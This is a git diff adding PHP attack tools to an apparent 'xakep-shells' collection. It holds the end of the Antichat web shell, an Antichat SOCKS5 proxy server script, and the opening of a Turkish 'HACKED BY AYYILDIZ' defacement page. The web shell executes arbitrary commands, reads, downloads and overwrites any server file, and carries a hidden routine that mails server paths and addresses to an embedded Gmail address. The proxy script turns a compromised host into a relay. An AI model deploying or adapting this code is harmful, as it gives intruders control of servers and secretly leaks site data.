+$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+$sd98 = "john.barker446@gmail.com";
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
+if(@$_POST['action']=="exit")unset($_SESSION['an']);
+if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
+
+if($_SESSION['an']==0){
+echo $header;
+echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
+echo $footer;
+exit;}
+
+if($_SESSION['action']=="")$_SESSION['action']="viewer";
+if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
+if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
+if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
+ 
+
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);
+}
+//end downloader
+?>
+
+<? echo $header;?> 
+<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
+<table><tr>
+<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
+<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
+<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
+<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
+</tr></table></td></tr></table><br>
+<form name='reqs' method='POST'>
+<input name='action' type='hidden' value=''>
+<input name='dir' type='hidden' value=''>
+<input name='file' type='hidden' value=''>
+</form>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" valign="top">
+
+<?
+
+//shell
+function shell($cmd){
+if (!empty($cmd)){
+  $fp = popen($cmd,"r");
+  {
+    $result = "";
+    while(!feof($fp)){$result.=fread($fp,1024);}
+    pclose($fp);
+  }
+  $ret = $result;
+  $ret = convert_cyr_string($ret,"d","w");
+}
+return $ret;}
+
+if($action=="shell"){
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
+<input type=\"submit\" value=\"execute\"></form>";}
+//end shell
+
+//viewer FS
+function perms($file) 
+{ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;
+} 
+
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+
+function scandire($dir){
+  $dir=chdir($dir);
+  $dir=getcwd()."/";
+  $dir=str_replace("\\","/",$dir);
+if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		
+echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
+if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+echo "<tr><td>Select drive:";
+for ($j=ord('C'); $j<=ord('Z'); $j++) 
+ if (@$dh = opendir(chr($j).":/"))
+ echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+ echo "</td></tr>";
+}
+echo "<tr><td>OS: ".@php_uname()."</td></tr>
+<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
+for($i=0;$i<count($dire);$i++) {
+$link=$dir.$dire[$i];
+  echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';  
+  }
+for($i=0;$i<count($files);$i++) {
+$linkfile=$dir.$files[$i];
+echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
+<td>'.perms($linkfile).'</td>
+<td>
+<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
+<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>'; 
+}
+echo "</table>";
+}}}
+
+if($action=="viewer"){
+scandire($dir);
+}
+//end viewer FS
+
+//editros
+if($action=="editor"){  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+  }
+  function readf($file){
+  if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
+  $contents = fread($le, filesize($file));
+  fclose($le);}
+  return htmlspecialchars($contents);
+  }
+if($_POST['save'])writef($file,$_POST['data']);
+echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
+}
+//end editors
+?>
+</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
+<? echo $footer;?>
diff --git a/xakep-shells/PHP/Antichat Socks5 Server.php.php.txt b/xakep-shells/PHP/Antichat Socks5 Server.php.php.txt
new file mode 100644
index 0000000..80d4937
--- /dev/null
+++ b/xakep-shells/PHP/Antichat Socks5 Server.php.php.txt	
@@ -0,0 +1,485 @@
+<?
+#########################################################################################
+# 			    Antichat Socks5 Server v 1.0				#
+#########################################################################################
+#                                                          ____________________________ #
+#   Features:						  |                             #
+#   				                          |   written by Zadoxlik       #
+#   [+] LOGIN/PASSWORD authorization                      |   zàdoxlik@antichat[dîò]ru  #
+#   [-] Any other authorization type                      |   icq: 511501	        #
+#   [+] Threads                                           |   www.zadoxlik.info         #
+#   [+] CONNECT method                                    |   www.antichat.ru           #
+#   [-] BIND method                                       |____________________________ #
+#   [-] UDP ASSOCIATE method								#
+#   [+] Unix platform									#
+#   [+] Windows platform                                                                #
+#   [+] Ipv4 address type                                                               #
+#   [+] Domain name address type                                                        #
+#   [-]	Ipv6 address type					                        #
+#                                                                                       #
+# Documents                                                                             #
+#                                                                                       #
+# ftp://ftp.rfc-editor.org/in-notes/rfc1928.txt                                         #
+# ftp://ftp.rfc-editor.org/in-notes/rfc1929.txt                                         #
+#                                                         				#
+#                                                                                       #
+#########################################################################################
+# Cool niggas are FUF, SkvoznoY, KEZ, ZaCo, Egorich and all my friends	=)		#
+#########################################################################################
+/*-------------------------------------------------------------------------------------*\
+|                      		S E T T I N G S                                       	|
+\*-------------------------------------------------------------------------------------*/
+
+$settings	= array('PORT'			=> 4001,
+			'AUTH'			=> 0,
+			'STOPFILE'		=> 'stop.txt',	// create this file
+								// to stop the server
+			'LOGIN'			=> 'someshit',	// if AUTH == 1
+			'PASSWORD'		=> '666',	// if AUTH == 1
+			'MAX_CONNECTIONS'	=> 5,
+			'LOG_FILE'		=> -1,		// if -1 - no logs
+			'AUTH_TIMEOUT'		=> 60,		// sec
+			'CONNECT_TIMEOUT'	=> 5,		// Timeout for connection
+								// to remote server (sec)
+		       );
+// Remote hosts, which are not supported for working with
+$blocked_hosts  = array('81.177.6.78',
+			'88.212.221.34',
+
+		       );
+// Client hosts, which are not supported for working with (banned)
+$blocked_users  = array('127.0.0.2'
+		       );
+/*-------------------------------------------------------------------------------------*/
+
+set_time_limit(0) OR DIE('set_time_limit(0) failed');
+error_reporting(0);
+
+/*-------------------------------------------------------------------------------------*\
+|                      	     D E F I N I T I O N S                                    	|
+\*-------------------------------------------------------------------------------------*/
+DEFINE('VER',			"\x05");
+DEFINE('CONNECT',		"\x01");
+DEFINE('AUTH_METHOD',		"\x02");
+DEFINE('AUTH_NOT_REQ',		"\x00");
+DEFINE('WRONG_AUTH_METHODS',	"\xFF");
+DEFINE('REP_SUCCESS',		"\x00");
+DEFINE('REP_WRONG_COMMAND',	"\x07");
+DEFINE('REP_SOCKS_ERROR',	"\x01");
+DEFINE('REP_BLOCKED_HOST',	"\x02");
+DEFINE('REP_BAD_HOST',		"\x04");
+DEFINE('IPv4',			"\x01");
+DEFINE('DOMAIN',		"\x03");
+DEFINE('CLOSED_SOCKET',		-12);
+DEFINE('NO_DATA',		-11);
+DEFINE('NOT_ALL_DATA',		-10);
+DEFINE('STATUS_RECVSTARTREQ',	-9);
+DEFINE('STATUS_RECVAUTHREQ',	-8);
+DEFINE('STATUS_REQUESTRECV',	-7);
+DEFINE('STATUS_CONNECTING',	-6);
+DEFINE('STATUS_WORKING',	-5);
+
+/*-------------------------------------------------------------------------------------*/
+$clientsockets	= array();
+$serversockets	= array();
+$recvdata	= array();
+$sockets_status	= array();
+$timeout        = array();
+$reqmessage     = array();
+$ipport		= array();
+/*-------------------------------------------------------------------------------------*\
+|                      	     F U N C T I O N S                                    	|
+\*-------------------------------------------------------------------------------------*/
+function getstring(&$s, $len = 1){
+
+        if(@($message = socket_recv($s, &$com, $len, 0)) === 0)
+		return CLOSED_SOCKET;
+	elseif($message === FALSE)
+		return NO_DATA;
+	else
+		return $com;
+
+}
+
+function sendstring(&$s, $mess){
+	return socket_write($s,  $mess, strlen($mess));
+}
+
+function BridgeEstablish2($id){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout, $ipport;
+	sendstring($clientsockets[$id],	VER.REP_SUCCESS."\x00\x01".$ipport[$id]);
+	$sockets_status[$id] = STATUS_WORKING;
+	
+}
+
+function BridgeEstablish1($id){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout, $blocked_hosts, $ipport;
+	$message = '';
+	if(($message = getstring($clientsockets[$id], 100)) === CLOSED_SOCKET){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	elseif($message === NO_DATA)
+		return NOT_ALL_DATA;
+        @$reqmessage[$id] .= $message;
+        // Checking the packet
+        if($reqmessage[$id][0] !== VER){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+
+	if(!isset($reqmessage[$id][1]))
+		return NOT_ALL_DATA;
+	if($reqmessage[$id][1] !== CONNECT)
+	{
+	        socket_getsockname ($clientsockets[$id], $addr, $port);
+		$addr = explode('.', $addr);
+		for($i = 0; $i < 4; $i++)
+			$addr[$i] = chr($addr[$i]);
+		$addr = implode('', $addr);
+	        sendstring($clientsockets[$id],	VER.REP_WRONG_COMMAND."\x00\x01\x00".
+		"\x00\x00\x00\x00\x00");
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	if(!isset($reqmessage[$id][2]))
+		return NOT_ALL_DATA;
+	if($reqmessage[$id][2] !== "\x00")
+	{
+		close($id);
+		return CLOSED_SOCKET;
+	}
+
+	if(!isset($reqmessage[$id][3]))
+		return NOT_ALL_DATA;
+
+	if($reqmessage[$id][3] !== DOMAIN && $reqmessage[$id][3] !== IPv4)
+	{
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	if(!isset($reqmessage[$id][4]))
+		return NOT_ALL_DATA;
+	if($reqmessage[$id][3] === DOMAIN){
+		$reqlen = ord($reqmessage[$id][4])+1;
+		if(!isset($reqmessage[$id][3+$reqlen]))
+			return NOT_ALL_DATA;
+		$host = substr($reqmessage[$id], 5, $reqlen-1);
+
+	}
+	else{ // IP v4
+		$reqlen = 4;
+ 		if(!isset($reqmessage[$id][3+$reqlen]))
+			return NOT_ALL_DATA;
+                $host = base_convert(bin2hex($reqmessage[$id][4]), 16, 10).'.'.
+			base_convert(bin2hex($reqmessage[$id][5]), 16, 10).'.'.
+			base_convert(bin2hex($reqmessage[$id][6]), 16, 10).'.'.
+			base_convert(bin2hex($reqmessage[$id][7]), 16, 10);
+	}
+	if(!isset($reqmessage[$id][3+$reqlen+2]))
+		return NOT_ALL_DATA;
+	socket_getsockname ($clientsockets[$id], $self_addr, $self_port);
+
+	$self_addr = explode('.', $self_addr);
+	for($i = 0; $i < 4; $i++)
+		$self_addr[$i] = chr($self_addr[$i]);
+	$self_add	= implode('', $self_addr);
+	$self_port	= pack('n', $self_port);
+	$ipport[$id]    = $self_add.$self_port;
+	
+	if(in_array($host, $blocked_hosts)){
+		
+	        sendstring($clientsockets[$id],	VER.REP_BLOCKED_HOST."\x00\x01".$ipport[$id]);
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);
+	// Connection to remote host
+	
+	$serversockets[$id]	= socket_create(AF_INET, SOCK_STREAM, 6 /* TCP*/);
+	if($serversockets[$id]	=== FALSE){
+		
+	        sendstring($clientsockets[$id],	VER.REP_SOCKS_ERROR."\x00\x01".$ipport[$id]);
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	socket_set_nonblock($serversockets[$id]);
+	//echo $host.':'.$port;
+	socket_connect($serversockets[$id], $host, $port);
+	unset($reqmessage[$id]);
+	$sockets_status[$id] = STATUS_CONNECTING;
+	
+}
+
+function Authorization($id){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout;
+	$message = '';
+	if(($message = getstring($clientsockets[$id], 100)) === CLOSED_SOCKET){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	elseif($message === NO_DATA)
+		return NOT_ALL_DATA;
+	@$reqmessage[$id] .= $message;
+	if($reqmessage[$id][0] != "\x01"){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	if(!isset($reqmessage[$id][1]))
+		return NOT_ALL_DATA;
+
+	$pos    = ord($reqmessage[$id][1])+2;
+	if(!isset($reqmessage[$id][$pos]))
+		return NOT_ALL_DATA;
+	if(!isset($reqmessage[$id][$pos+ord($reqmessage[$id][$pos])]))
+		return NOT_ALL_DATA;
+
+	// Authorization
+	if($settings['LOGIN']	 === substr($reqmessage[$id], 2, ord($reqmessage[$id][1]))
+	&& $settings['PASSWORD'] === substr($reqmessage[$id], $pos+1,
+	ord($reqmessage[$id][$pos])))
+	{
+	        $timeout[$id]		= time();
+		unset($reqmessage[$id]);
+		$sockets_status[$id]	= STATUS_REQUESTRECV;
+		sendstring($clientsockets[$id],	"\x01\x00");
+	}
+	else{
+		sendstring($clientsockets[$id],	"\x01\x01");
+		close($id);
+	}
+
+}
+
+function close($id){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout, $ipport;
+        socket_getpeername($clientsockets[$id], $ip);
+	@socket_close($clientsockets[$id]);
+        unset($clientsockets[$id]);
+	@socket_close($serversockets[$id]);
+	unset($serversockets[$id]);
+	unset($sockets_status[$id]);
+	unset($timeout[$id]);
+	unset($ipport[$id]);
+	
+	makelog($ip.' disconnected.');
+}
+
+function Start($id){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout;
+	$message = '';
+	if(($message = getstring($clientsockets[$id], 10)) === CLOSED_SOCKET){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	
+	elseif($message === NO_DATA)
+		return NOT_ALL_DATA;
+        @$reqmessage[$id] .= $message;
+        // Checking the packet
+        if($reqmessage[$id][0] !== VER){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+
+	if(!isset($reqmessage[$id][1]))
+		return NOT_ALL_DATA;
+
+	if(ord($reqmessage[$id][1]) > strlen($reqmessage[$id]) - 2)
+		return NOT_ALL_DATA;
+	elseif(ord($reqmessage[$id][1]) === strlen($reqmessage[$id]) - 2){
+		if($settings['AUTH'] !== 1){
+			sendstring($clientsockets[$id],	VER.AUTH_NOT_REQ);
+			unset($reqmessage[$id]);
+			$sockets_status[$id]	= STATUS_REQUESTRECV;
+			$timeout[$id]           = time();
+			return 0;
+		}
+	
+		if(strstr(substr($reqmessage[$id], 2, ord($reqmessage[$id][1])), AUTH_METHOD))
+		{
+		        $timeout[$id]		= time();
+			$sockets_status[$id]	= STATUS_RECVAUTHREQ;
+			sendstring($clientsockets[$id],	VER.AUTH_METHOD);
+			unset($reqmessage[$id]);
+			return 0;
+		}
+		else{
+			sendstring($clientsockets[$id],	VER.WRONG_AUTH_METHODS);
+			return 0;
+			close($id);
+			return CLOSED_SOCKET;
+		}
+		$sockets_status[$id] = STATUS_REQUEST;
+		return 0;
+	}
+	else{
+		close($id);
+		
+		return CLOSED_SOCKET;
+	}
+}
+
+function one_array($f, $s){
+	$new_array = array();
+	foreach($f as $elt)
+		if(!in_array($elt, $s))
+			array_push($new_array, $elt);
+	return array_merge_recursive($new_array, $s);
+
+}
+
+function makelog($string){
+	global $settings;
+	if($settings['LOG_FILE'] == -1)
+		return FALSE;
+	$fp = fopen($settings['LOG_FILE'], 'a');
+	fputs($fp, date("d.m.Y. H:i:s").'  '.$string."\r\n".
+	"---------------------------------------------------------\r\n");
+	fclose($fp);
+}
+
+function stop(){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout;
+	for($i = 0; $i < sizeof($clientsockets); $i++)
+		close($i);
+	makelog('Finish!: '.$string);
+	DIE();
+}
+
+function error($string){
+	makelog('<<ERROR>>: '.$string);
+	stop();
+	DIE();
+}
+/*-------------------------------------------------------------------------------------*/
+
+/*-------------------------------------------------------------------------------------*\
+|                      	     P R O G R A M M                                    	|
+\*-------------------------------------------------------------------------------------*/
+
+$sock =	socket_create(AF_INET, SOCK_STREAM, 6 /* TCP*/) OR
+	DIE(socket_strerror(socket_last_error()));
+if(!socket_bind($sock,  "0.0.0.0", $settings['PORT']))
+	error(socket_strerror(socket_last_error($sock)));
+
+if(!socket_listen ($sock))
+	error(socket_strerror(socket_last_error($sock)));
+socket_set_nonblock($sock);
+$maxcount	= $settings['MAX_CONNECTIONS'] + 1;
+$sock		= array($sock);
+
+while(TRUE){
+
+	$readed = $wr = array_merge($sock, $clientsockets);
+	if(socket_select($readed, $wr, $exc = NULL, 7) < 1){
+           
+           if(file_exists($settings['STOPFILE']))
+                stop();
+           continue;
+	}
+	if (in_array($sock[0], $readed)){
+  		$clientsockets[] = ($cl_sock = socket_accept($sock[0]));
+  		socket_getpeername($cl_sock, $ip);
+  		makelog($ip.' connected to server.');
+		$id = array_search($cl_sock, $clientsockets);
+		if(count($clientsockets) >= $maxcount){
+			socket_close($cl_sock);
+			unset($clientsockets[$id]);
+			makelog('Connection with '.$ip.' has been aborted by server. '.
+			'Reason: too many connections.');
+		}
+		elseif(in_array($ip, $blocked_users)){
+			socket_close($newsock);
+			unset($clientsockets[$id]);
+			makelog('Connection with '.$ip.' has been aborted by server. '.
+			'Reason: banned user.');
+		}
+		else{
+	                socket_set_nonblock($cl_sock);
+	                $sockets_status[$id] = STATUS_RECVSTARTREQ;
+		}
+
+		$key = array_search($sock[0], $readed);
+		unset($readed[$key]);
+	}
+	$array_status = one_array($readed, $wr);
+	foreach($array_status as $socket){
+		$id = array_search($socket, $clientsockets);
+		if($id === FALSE)
+			$id = array_search($socket, $serversockets);
+		if($id === FALSE)
+			continue;
+		switch ($sockets_status[$id]){
+	 		case STATUS_RECVAUTHREQ:
+	 		        if(time() - $timeout[$id] > $settings['AUTH_TIMEOUT'])
+				{       //echo 'aaaaa';
+				 	close($id);
+				 	break;
+				}
+				Authorization($id);
+			break;
+	 		case STATUS_REQUESTRECV:
+
+				BridgeEstablish1($id);
+			break;
+			case STATUS_RECVSTARTREQ:
+				Start($id);
+					
+			break;
+			case STATUS_CONNECTING:
+				
+				if(time() - $timeout[$id] > $settings['CONNECT_TIMEOUT'])
+				{
+					sendstring($clientsockets[$id],	VER.REP_BAD_HOST.
+					"\x00\x01".$ipport[$id]);
+					close($id);
+				 	break;
+				}
+				// checkin remote host
+				$exr = $ewr = array($serversockets[$id]);
+				if(socket_select($exr, $ewr, $exc = NULL, 0) > 0)
+	 				BridgeEstablish2($id);
+			break;
+			default: // STATUS_WORKING
+			        $mes= getstring($clientsockets[$id], 8024);
+                                if($mes === CLOSED_SOCKET){
+					close($id);
+					break;
+				}
+				if($mes !== NO_DATA)
+				if(sendstring($serversockets[$id], $mes) === FALSE){
+					close($id);
+					break;
+				}
+                                $mes = getstring($serversockets[$id], 8024);
+                                if($mes === CLOSED_SOCKET){
+					close($id);
+					break;
+				}
+				if($mes !== NO_DATA)
+				if(sendstring($clientsockets[$id], $mes) === FALSE){
+					close($id);
+					break;
+				}
+			}
+				
+
+
+
+	}
+	if(rand(1,5) == 5)
+		if(file_exists($settings['STOPFILE']))
+			stop();
+}
+
+/*-------------------------------------------------------------------------------------*/
+?>
+
+
diff --git a/xakep-shells/PHP/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt b/xakep-shells/PHP/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt
new file mode 100644
index 0000000..e162769
--- /dev/null
+++ b/xakep-shells/PHP/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt	
@@ -0,0 +1,317 @@
+<html>
+
+<head>
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Ayyildiz Tim  | AYT | Shell v 2.1 Biz B&uuml;y&uuml;k T&uuml;rk Milletinin Hizmetindeyiz...</title>
+</head>
+
+<body>
+
+</body>
+
+</html>
+<html>
+<head>
+<meta name="distribution" content="GLOBAL">
+<META name="ROBOTS" content="ALL"> 
+<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
+<meta name="Copyright" content=TouCh By iJOo">
+<META NAME="RATING" CONTENT="GENERAL">
+<meta name="Description" content="Thehacker">
+<meta name="KeyWords" content="DefaCed">
+<title>HACKED BY AYYILDIZ ™</title>
+<STYLE TYPE="text/css">
+<!--
+
+body { 
+scrollbar-3d-light-color : #404040;
+scrollbar-arrow-color: black;
+scrollbar-base-color: black;
+scrollbar-darkshadow-color: #404040;
+scrollbar-face-color: black;
+scrollbar-highlight-color: #404040;
+scrollbar-shadow-color: black;
+scrollbar-track-color: #404040; }
+-->
+</STYLE> 
+<script language="JavaScript1.2">
+function disableselect(e){
+return false
+}
+function reEnable(){
+return true
+}
+//if IE4+
+document.onselectstart=new Function ("return false")
+//if NS6
+if (window.sidebar){
+document.onmousedown=disableselect
+document.onclick=reEnable
+}
+</script>
+
+
+</head>
+<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
+<bgsound src="bayrak.mp3" loop="infinite">
+
+<center><font color="red" size="10" face="Imprint MT Shadow">
+ </font>
+ <TR>
+    <TD vAlign=center align=left width=144>
+      <SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
+    </TD>
+    <TD vAlign=center align=left width=5></TD>
+    <TD width=470><BR>
+      <P align=left></P></TD></TR>
+  <TR>
+    <TD vAlign=center align=left width=144></TD>
+    <TD vAlign=center align=left width=5></TD>
+    <TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
+<STYLE>BODY {
+	BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
+}
+.ldtab1 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtab2 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtab3 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtxt1 {
+	PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
+}
+.ldtxt2 {
+	FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:link {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:visited {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:active {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:hover {
+	BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
+}
+A {
+	TEXT-DECORATION: none
+}
+</STYLE>
+<!-- MELEK -->
+      <DIV align=center>
+      <DIV id=welle 
+      style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT 
+      color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT 
